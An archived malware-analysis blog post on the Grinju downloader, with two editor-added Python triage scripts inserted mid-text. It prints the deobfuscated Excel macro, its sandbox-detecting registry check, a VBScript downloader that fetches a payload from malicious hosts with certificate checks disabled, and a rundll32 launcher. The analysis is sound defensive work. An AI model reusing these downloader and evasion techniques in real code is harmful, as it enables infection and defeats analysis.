{
	"id": "7eead36c-8e5a-4a57-99c7-73bc9ba55844",
	"created_at": "2026-04-06T00:11:03.591343Z",
	"updated_at": "2026-04-10T13:12:09.917077Z",
	"deleted_at": null,
	"sha1_hash": "68e254578ffbbaaf6ad627a81fec4f1c55f3371b",
	"title": "Grinju Downloader: Anti-analysis (on steroids) | Part 2",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1381950,
	"plain_text": "Grinju Downloader: Anti-analysis (on steroids) | Part 2\r\nBy Vishal Thakur\r\nPublished: 2020-10-06 · Archived: 2026-04-05 20:00:45 UTC\r\nThis malware takes anti-analysis and stealth techniques to a new level\r\nPress enter or click to view image in full size\r\nWe took a look at this malware in the Part 1 of this publication. Now let’s carry on with the analysis and dig\r\ndeeper into the various anti-analysis and stealth-exec features of this malware in Part2.\r\nMalpedia Inventory: https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju\r\nSecondary Macro Code\r\nFirst of all, here’s the entire code that is dumped in the sheet once all the macro functions have been completed.\r\nTake a look at these lines and try to figure out what they are meant to do. Then we’ll take a look at the most\r\nimportant of these briefly before moving on to the next section.\r\n=CLOSE(FALSE)\r\n=FORMULA(LEN(APP.MAXIMIZE())+-459,Sheet1!R18690C129)\r\n=FORMULA(LEN(GET.WINDOW(7))+-131,Sheet1!R18691C129)\r\n=FORMULA(LEN(GET.WINDOW(20))+-893,Sheet1!R18692C129)\r\n=FORMULA(LEN(GET.WINDOW(23)=3)+433,Sheet1!R18693C129)\r\n=FORMULA(LEN(GET.WORKSPACE(31))+864,Sheet1!R18694C129)\r\n=FORMULA(LEN(GET.WORKSPACE(13)\u003e770)+707,Sheet1!R18695C129)\r\n=FORMULA(LEN(GET.WORKSPACE(14)\u003e390)+-407,Sheet1!R18696C129)\r\n=FORMULA(LEN(GET.WORKSPACE(19))+373,Sheet1!R18697C129)\r\n=FORMULA(LEN(GET.WORKSPACE(42))+-476,Sheet1!R18698C129)\r\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))),,GOTO(R18689C129))\r\n=LEFT(GET.WORKSPACE(23),(FIND(\"Roaming\",GET.WORKSPACE(23),1)-1))\u0026\"Local\\Temp\\Nvf.vbs\"\r\n=LEFT(GET.WORKSPACE(23),(FIND(\"Roaming\",GET.WORKSPACE(23),1)-1))\u0026\"Local\\Temp\\Fp70.txt\"\r\n=FOPEN(R18700C129,3)\r\n=FWRITELN(R18702C129,\"On Error Resume Next\")\r\n=FWRITELN(R18702C129,\"Set wjfcRJhw = CreateObject(\"\"WScript.Shell\"\")\")\r\nhttps://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce\r\nPage 1 of 
5\r\n=FWRITELN(R18702C129,\"Set ydvON = CreateObject(\"\"Scripting.FileSystemObject\"\")\")\r\n=FWRITELN(R18702C129,\"Set jPKt = ydvON.CreateTextFile(\"\"\"\u0026R18701C129\u0026\"\"\", True)\")\r\n=FWRITELN(R18702C129,\"T9s=wjfcRJhw.RegRead(\"\"HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Exce\r\nCreateObject(\"\"WScript.Shell\"\")\").RegRead(\"\"HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\r\n=FCLOSE(R18702C129)\r\n=EXEC(\"explorer.exe \"\u0026R18700C129\u0026\"\")\r\n=WHILE(ISERROR(FILES(R18701C129)))\r\n=WAIT(NOW()+\"00:00:01\")\r\n=NEXT()\r\n=FILE.DELETE(R18700C129)\r\n=FOPEN(R18701C129,2)\r\n=FREAD(R18715C129,100)\r\n=FCLOSE(R18715C129)\r\n=FILE.DELETE(R18701C129)\r\n=IF(ISNUMBER(SEARCH(\"1\",R18716C129)),GOTO(R18689C129),)\r\n=IF(ISNUMBER(SEARCH(\"32\",GET.WORKSPACE(1))),GOTO(R4019C240),GOTO(R4046C240))\r\n(The two RegRead lines are cut off in the dump; they are quoted again and explained in the next section.)\r\nDepending on the execution flow (covered in Part 1), only selected lines from the code above are picked for execution.\r\nThese lines take their inputs from other cells of the sheet (by formula reference rather than by literal value) and assemble\r\nVBS code that is eventually written to disk and run as a script. The lines shown here build the short registry-check script\r\nNvf.vbs; the final downloader is dropped the same way.\r\nThere’s more that these functions do as well, so let’s get into it!\r\nStealth Tactics\r\nThis one creates a text file, the purpose of which is rather sinister ;)\r\n=FWRITELN(R18702C129,\"Set jPKt = ydvON.CreateTextFile(\"\"\"\u0026R18701C129\u0026\"\"\", True)\")\r\nWhat’s happening here is that the VBS creates a text file through the Scripting.FileSystemObject (ydvON) with CreateTextFile;\r\nthe path is spliced in from cell R18701C129, which the earlier LEFT(GET.WORKSPACE(23),...) line built as Local\\Temp\\Fp70.txt\r\nunder the user’s AppData directory. 
The text file\r\nreceives a single value, which the script reads out of the registry, and a later formula uses that value to do something really cheeky.\r\nLet’s take a look.\r\n=FWRITELN(R18702C129,\"T9s=wjfcRJhw.RegRead(\"\"HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Exce\r\nCreateObject(\"\"WScript.Shell\"\")\").RegRead(\"\"HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\r\nThe two lines above (both cut off in the dump) do the following:\r\n1. Open the registry through the WScript.Shell object (wjfcRJhw) and call RegRead\r\n2. Read the Excel macro security-warning setting under HKCU\\Software\\Microsoft\\Office\\<version>\\Excel... (the rest of the key\r\nand value name is truncated in the dump); GET.WORKSPACE(2) supplies the installed Excel version so the key matches whatever\r\nOffice is present\r\n3. Write the value that came back into the text file created in the earlier step (Fp70.txt)\r\nNote that the script only reads the registry; there is no RegWrite anywhere in the dump. The macro then waits for the file to\r\nappear, reads its first 100 characters into R18716C129, deletes it (the VBS itself was deleted right after it ran) and evaluates:\r\n=IF(ISNUMBER(SEARCH(\"1\",R18716C129)),GOTO(R18689C129),)\r\nWhat does it actually do and how exactly is it sinister/cheeky?\r\nWhen this setting is 1, it basically means that ALL macros run automatically, without any warnings: that ‘Enable Content’\r\nwarning at the top that has saved your life as an incident response engineer many times (although many people still click and\r\nenable it) never appears. That is the configuration an analyst’s sandbox or malware VM typically runs with, and one an ordinary\r\nvictim rarely has. So when the value read back contains 1, the GOTO sends the macro to R18689C129, the =CLOSE(FALSE) line at the\r\ntop of the dump, and the workbook closes without saving: the chain stops right there. When the warning is still enabled (any\r\nother value), the FALSE branch of the IF is empty and execution falls through to the next line. Hence sinister and cheeky: the\r\nvery setting that would let the macro run silently is treated as the tell-tale of an analysis environment, and the malware bails\r\nout rather than show its second stage to a sandbox.\r\nNow let’s look at more functions.\r\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))),,GOTO(R18689C129))\r\nHere you can see that the code runs the GET.WORKSPACE(1) function, which returns the name of the environment the\r\nmalware is running in. It searches the result for the text “Windows”: if it is found, the TRUE branch is empty and execution\r\nfalls through to the next line; if it is not found, the GOTO sends execution to R18689C129, the =CLOSE(FALSE) line, and the\r\nworkbook closes. 
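Added example (not code from the original post or from the malware): the script below resolves the control flow of the dumped column so that the two exit checks can be read off instead of traced by hand. It assumes the dump is one contiguous column whose first line sits in R18689C129, which is what the FORMULA() targets and the FOPEN/FREAD references in the dump imply, and it works on a constructed copy of the dump in which the two truncated RegRead lines are abbreviated (they still occupy their two rows). It also lists the GET.WORKSPACE/GET.WINDOW probes so you can see which environment properties the arithmetic at the top of the dump fingerprints.

```python
"""Resolve GOTO targets and IF branches in a dumped Excel 4.0 (XLM) macro column.
Added example, not code from the post or the malware. Assumption: the dump is one
contiguous column starting at R18689C129 (the FORMULA() calls write from R18690C129
onwards and the FOPEN/FREAD references line up with that), so row = 18689 + index."""
import re

FIRST_ROW, COL = 18689, 129

# Constructed copy of the post's dump; the two RegRead lines are truncated in the
# post and abbreviated here, but still occupy their two rows (18707 and 18708).
DUMP = r'''=CLOSE(FALSE)
=FORMULA(LEN(APP.MAXIMIZE())+-459,Sheet1!R18690C129)
=FORMULA(LEN(GET.WINDOW(7))+-131,Sheet1!R18691C129)
=FORMULA(LEN(GET.WINDOW(20))+-893,Sheet1!R18692C129)
=FORMULA(LEN(GET.WINDOW(23)=3)+433,Sheet1!R18693C129)
=FORMULA(LEN(GET.WORKSPACE(31))+864,Sheet1!R18694C129)
=FORMULA(LEN(GET.WORKSPACE(13)>770)+707,Sheet1!R18695C129)
=FORMULA(LEN(GET.WORKSPACE(14)>390)+-407,Sheet1!R18696C129)
=FORMULA(LEN(GET.WORKSPACE(19))+373,Sheet1!R18697C129)
=FORMULA(LEN(GET.WORKSPACE(42))+-476,Sheet1!R18698C129)
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R18689C129))
=LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local\Temp\Nvf.vbs"
=LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local\Temp\Fp70.txt"
=FOPEN(R18700C129,3)
=FWRITELN(R18702C129,"On Error Resume Next")
=FWRITELN(R18702C129,"Set wjfcRJhw = CreateObject(""WScript.Shell"")")
=FWRITELN(R18702C129,"Set ydvON = CreateObject(""Scripting.FileSystemObject"")")
=FWRITELN(R18702C129,"Set jPKt = ydvON.CreateTextFile("""&R18701C129&""", True)")
=FWRITELN(R18702C129,"T9s=wjfcRJhw.RegRead(...)")
=FWRITELN(R18702C129,"(...).RegRead(...)")
=FCLOSE(R18702C129)
=EXEC("explorer.exe "&R18700C129&"")
=WHILE(ISERROR(FILES(R18701C129)))
=WAIT(NOW()+"00:00:01")
=NEXT()
=FILE.DELETE(R18700C129)
=FOPEN(R18701C129,2)
=FREAD(R18715C129,100)
=FCLOSE(R18715C129)
=FILE.DELETE(R18701C129)
=IF(ISNUMBER(SEARCH("1",R18716C129)),GOTO(R18689C129),)
=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R4019C240),GOTO(R4046C240))'''


def load_column(dump, first_row=FIRST_ROW, col=COL):
    """Map (row, col) -> formula text for one contiguous dumped column."""
    return {(first_row + i, col): line for i, line in enumerate(dump.splitlines())}


def split_args(arglist):
    """Split on top-level commas only: not inside (...) and not inside "..." literals."""
    args, cur, depth, in_str = [], [], 0, False
    for ch in arglist:
        if ch == '"':
            in_str = not in_str          # a doubled "" toggles twice, which is fine
        elif not in_str and ch in '()':
            depth += 1 if ch == '(' else -1
        elif not in_str and ch == ',' and depth == 0:
            args.append(''.join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    args.append(''.join(cur).strip())
    return args


def if_branches(formula):
    """(condition, true_branch, false_branch) of an =IF(...) row, or None."""
    if not (formula.upper().startswith('=IF(') and formula.endswith(')')):
        return None
    return tuple((split_args(formula[4:-1]) + ['', ''])[:3])


def describe_branch(expr, cells):
    """What one IF branch does: fall through, jump to a resolved cell, or evaluate."""
    if expr == '':
        return 'fall through to next row'
    m = re.fullmatch(r'GOTO\(R(\d+)C(\d+)\)', expr, re.IGNORECASE)
    if not m:
        return 'evaluate: ' + expr
    target = (int(m.group(1)), int(m.group(2)))
    return 'jump to R%dC%d -> %s' % (target + (cells.get(target, '<outside the dump>'),))


def control_flow(cells):
    """Every IF row in the column with the resolved effect of its two branches."""
    steps = []
    for (row, _), formula in sorted(cells.items()):
        branches = if_branches(formula)
        if branches:
            steps.append({'row': row, 'condition': branches[0],
                          'true': describe_branch(branches[1], cells),
                          'false': describe_branch(branches[2], cells)})
    return steps


def fingerprint_calls(cells):
    """Deduplicated GET.WORKSPACE(n)/GET.WINDOW(n) probes used anywhere in the column."""
    return sorted({c for f in cells.values()
                   for c in re.findall(r'GET\.(?:WORKSPACE|WINDOW)\(\d+\)', f)})


if __name__ == '__main__':
    cells = load_column(DUMP)
    for step in control_flow(cells):
        print('R%dC%d: IF %s\n   TRUE  -> %s\n   FALSE -> %s' % (
            step['row'], COL, step['condition'], step['true'], step['false']))
    print('environment probes:', ', '.join(fingerprint_calls(cells)))
```

Run as a script, rows 18699 and 18719 both resolve their exit branch to ‘jump to R18689C129 -> =CLOSE(FALSE)’, while row 18720 resolves to cells outside the dumped column (the 32-bit and 64-bit paths). The same load_column/control_flow pair works on any XLM column dumped with its starting row known, which is the usual situation after deobfuscating a sheet with an emulator.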
Basically, it wouldn’t bother running in any other environment.\r\n=IF(ISNUMBER(SEARCH(\"32\",GET.WORKSPACE(1))),GOTO(R4019C240),GOTO(R4046C240))\r\nAbove, you can see another neat way of making the malware execute differently depending on the environment it is running in.\r\nGET.WORKSPACE(1) again returns the environment string; if it contains “32” (a 32-bit Excel) the macro jumps to R4019C240, and\r\notherwise (64-bit) to R4046C240, two separate code paths elsewhere in the sheet. Simple but effective.\r\nThe rest of the functions are pretty straightforward: writing files, executing them (via explorer.exe) and deleting the\r\nfiles once done with them.\r\nHere’s the downloader script that is dropped (the post gives its path as Local\\Temp\\Nvf.vbs, the same path the macro dump\r\nabove uses for the registry-check script):\r\ncNk = \"hxxps://channelmelabd.com/wp-keys.php\"\r\nZN4j82Zg = \"hxxps://ezy.id/wp-keys.php\"\r\nhxSq = \"hxxps://ksuengineering.com/wp-keys.php\"\r\noP744tD = \"hxxps://laserdoctor.com.br/wp-keys.php\"\r\nFmI4 = Array(cNk,ZN4j82Zg,hxSq,oP744tD)\r\nDim Yp9: Set Yp9 = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")\r\nFunction b41wemtX(data):\r\nYp9.setOption(2) = 13056\r\nYp9.Open \"GET\", data, False\r\nYp9.setRequestHeader \"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"\r\nYp9.Send\r\nb41wemtX = Yp9.Status\r\nEnd Function\r\nFor Each cpm0q7 in FmI4\r\nIf b41wemtX(cpm0q7) = 200 Then\r\nDim t1AEo: Set t1AEo = CreateObject(\"ADODB.Stream\")\r\nt1AEo.Open\r\nt1AEo.Type = 1\r\nt1AEo.Write Yp9.ResponseBody\r\nt1AEo.SaveToFile \"C:\\Users\\Ragnar Lothbrok\\AppData\\Local\\Temp\\ZsQrgSU.html\", 2\r\nt1AEo.Close\r\nExit For\r\nEnd If\r\nNext\r\nAs you can see above, the script tries its four URLs in order and takes the first that answers HTTP 200, then writes the\r\nresponse body as a binary ADODB.Stream (Type = 1) to an .html file, “ZsQrgSU.html”. Two details worth noting: setOption(2) = 13056\r\nsets all four SXH_SERVER_CERT_IGNORE_* flags on ServerXMLHTTP, so an unknown CA, a wrong hostname or an expired certificate on\r\nthe download host does not stop the fetch, and the ancient MSIE 6.0 User-Agent is a cheap thing to hunt for in proxy logs. The\r\ndownloaded file is supposed to be the second-stage malware.\r\nBy the time I got to it, there was nothing to download but there are strong indications that it is a DLL. 
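Added example (not code from the post or from the malware): a small triage routine that pulls the IOCs out of a dropped VBScript like the one above and flags the tricks it relies on: the ServerXMLHTTP setOption(2) value decoded into the certificate errors it ignores, a binary ADODB.Stream written under a non-executable extension, the GetObject new: moniker, and a rundll32.exe launch pointed into the download directory. SAMPLE is a constructed concatenation of the downloader above and the one-line rundll32 launcher the post quotes next, with the rundll32 argument left cut off exactly as it is in the post; the CLSID-to-ShellBrowserWindow identification and the SXH flag names are the editor’s, not the post’s.

```python
"""Triage a dropped VBScript downloader: extract IOCs and flag the tricks it relies on.
Added example, not code from the post or the malware. SAMPLE is a constructed
concatenation of the two scripts the post quotes, with the rundll32 argument left
cut off as it is in the post. Nothing here runs the script or touches the network."""
import ntpath
import re

# SXH_SERVER_CERT_IGNORE_* bits for MSXML2.ServerXMLHTTP.setOption(2); 13056 is all four.
SXH_CERT_FLAGS = {
    0x100: 'unknown CA',
    0x200: 'wrong certificate usage',
    0x1000: 'hostname (CN) mismatch',
    0x2000: 'expired or not-yet-valid certificate',
}
# CLSID of ShellBrowserWindow (editor's identification): GetObject("new:" + CLSID)
# returns a shell object whose Document.Application exposes ShellExecute.
SHELL_BROWSER_WINDOW = 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'

SAMPLE = r'''cNk = "hxxps://channelmelabd.com/wp-keys.php"
ZN4j82Zg = "hxxps://ezy.id/wp-keys.php"
hxSq = "hxxps://ksuengineering.com/wp-keys.php"
oP744tD = "hxxps://laserdoctor.com.br/wp-keys.php"
FmI4 = Array(cNk,ZN4j82Zg,hxSq,oP744tD)
Dim Yp9: Set Yp9 = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Function b41wemtX(data):
Yp9.setOption(2) = 13056
Yp9.Open "GET", data, False
Yp9.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
Yp9.Send
b41wemtX = Yp9.Status
End Function
For Each cpm0q7 in FmI4
If b41wemtX(cpm0q7) = 200 Then
Dim t1AEo: Set t1AEo = CreateObject("ADODB.Stream")
t1AEo.Open
t1AEo.Type = 1
t1AEo.Write Yp9.ResponseBody
t1AEo.SaveToFile "C:\Users\Ragnar Lothbrok\AppData\Local\Temp\ZsQrgSU.html", 2
t1AEo.Close
Exit For
End If
Next
Set tyMG = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
tyMG.Document.Application.ShellExecute "rundll32.exe","C:\Users\Ragnar Lothbrok\AppData\Local\Temp\Zs'''


def extract_urls(text):
    """URLs in order of appearance; defanged hxxp/hxxps forms are kept defanged."""
    return re.findall(r'h(?:xx|tt)ps?://[^\s"\']+', text, re.IGNORECASE)


def ignored_cert_errors(text):
    """Certificate errors a ServerXMLHTTP.setOption(2) = N call tells MSXML to ignore."""
    m = re.search(r'setOption\(2\)\s*=\s*(\d+)', text)
    if not m:
        return []
    value = int(m.group(1))
    return [name for bit, name in SXH_CERT_FLAGS.items() if value & bit]


def triage(text):
    """IOCs plus a list of findings for a VBScript downloader/launcher (string matching only)."""
    saved = re.search(r'SaveToFile\s+"([^"]+)"', text)
    launch = re.search(r'"rundll32\.exe"\s*,\s*"([^"\n]*)', text, re.IGNORECASE)
    moniker = re.search(r'GetObject\("new:([0-9A-Fa-f-]{36})"\)', text)
    report = {
        'urls': extract_urls(text),
        'saved_as': saved.group(1) if saved else None,
        'rundll32_arg': launch.group(1) if launch else None,
        'ignored_cert_errors': ignored_cert_errors(text),
        'findings': [],
    }
    found = report['findings']
    if len(report['urls']) > 1 and re.search(r'=\s*200\s+Then', text) and 'Exit For' in text:
        found.append('%d download URLs; the first answering HTTP 200 wins' % len(report['urls']))
    if report['ignored_cert_errors']:
        found.append('TLS validation weakened: ignores ' + ', '.join(report['ignored_cert_errors']))
    if re.search(r'\.Type\s*=\s*1\b', text) and report['saved_as'] \
            and not report['saved_as'].lower().endswith(('.exe', '.dll')):
        found.append('binary ADODB.Stream written under a non-executable name: ' + report['saved_as'])
    if moniker:
        what = ' (ShellBrowserWindow)' if moniker.group(1).upper() == SHELL_BROWSER_WINDOW else ''
        found.append('GetObject("new:" + CLSID) moniker%s used to reach ShellExecute' % what)
    if report['rundll32_arg'] and report['saved_as'] and \
            ntpath.dirname(report['rundll32_arg']).lower() == ntpath.dirname(report['saved_as']).lower():
        found.append('rundll32.exe pointed into the download directory: the .html is loaded as a DLL')
    return report


if __name__ == '__main__':
    for key, value in triage(SAMPLE).items():
        print(key, '=', value)
```

It is deliberately string matching, which is what you want for a first pass over a batch of dropped scripts before anything goes near a detonation sandbox. The 13056 decodes to all four SXH_SERVER_CERT_IGNORE_* bits, so this downloader would accept a self-signed certificate on any of its four hosts, and the rundll32 finding fires because the (truncated) launch path shares its directory with the SaveToFile target.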
This\r\nconclusion is based on the fact that there’s another script that is dropped to execute this DLL, which uses\r\nrundll32.exe to load the DLL for execution:\r\nSet tyMG = GetObject(\"new:C08AFD90-F2A1-11D1-8455-00A0C91F3880\")\r\ntyMG.Document.Application.ShellExecute \"rundll32.exe\",\"C:\\Users\\Ragnar Lothbrok\\AppData\\Local\\Temp\\Zs\r\nThe second line is cut off in the dump, but the path prefix matches the Temp directory the downloader saved into. The CLSID in\r\nthe new: moniker is ShellBrowserWindow: GetObject on it hands the script a live shell object whose Document.Application exposes\r\nShellExecute, so the process is launched without touching WScript.Shell.Run, and rundll32.exe loads whatever file it is given\r\nregardless of extension, so the .html name is cosmetic.\r\nConclusion\r\nSo this was a somewhat selective analysis of the interesting bits in the Grinju malware. As you can see, there are a lot\r\nof new tricks in anti-analysis and stealth techniques. We can see malware authors getting creative and digging up\r\nthese old, rarely used functions to bypass analysis and also make our lives harder. The registry trick is really neat\r\nin my opinion, credit where it’s due. I enjoyed the challenge that this malware presented and it was great to find\r\nthese new ways — now we can tell if other malware tries to use these or similar functions in the future.\r\nI know there are a few things that I’ve skipped over in these two posts; if you need more info or have Qs, hit me\r\nup on email (right at the top of this post) or in the comments below. The sample and YARA sig should be available on\r\nmy Malpedia entry.\r\nKeep learning and keep sharing!\r\nUseful links:\r\nSource: https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce"
	],
	"report_names": [
		"grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce"
	],
	"threat_actors": [],
	"ts_created_at": 1775434263,
	"ts_updated_at": 1775826729,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/68e254578ffbbaaf6ad627a81fec4f1c55f3371b.pdf",
		"text": "https://archive.orkl.eu/68e254578ffbbaaf6ad627a81fec4f1c55f3371b.txt",
		"img": "https://archive.orkl.eu/68e254578ffbbaaf6ad627a81fec4f1c55f3371b.jpg"
	}
}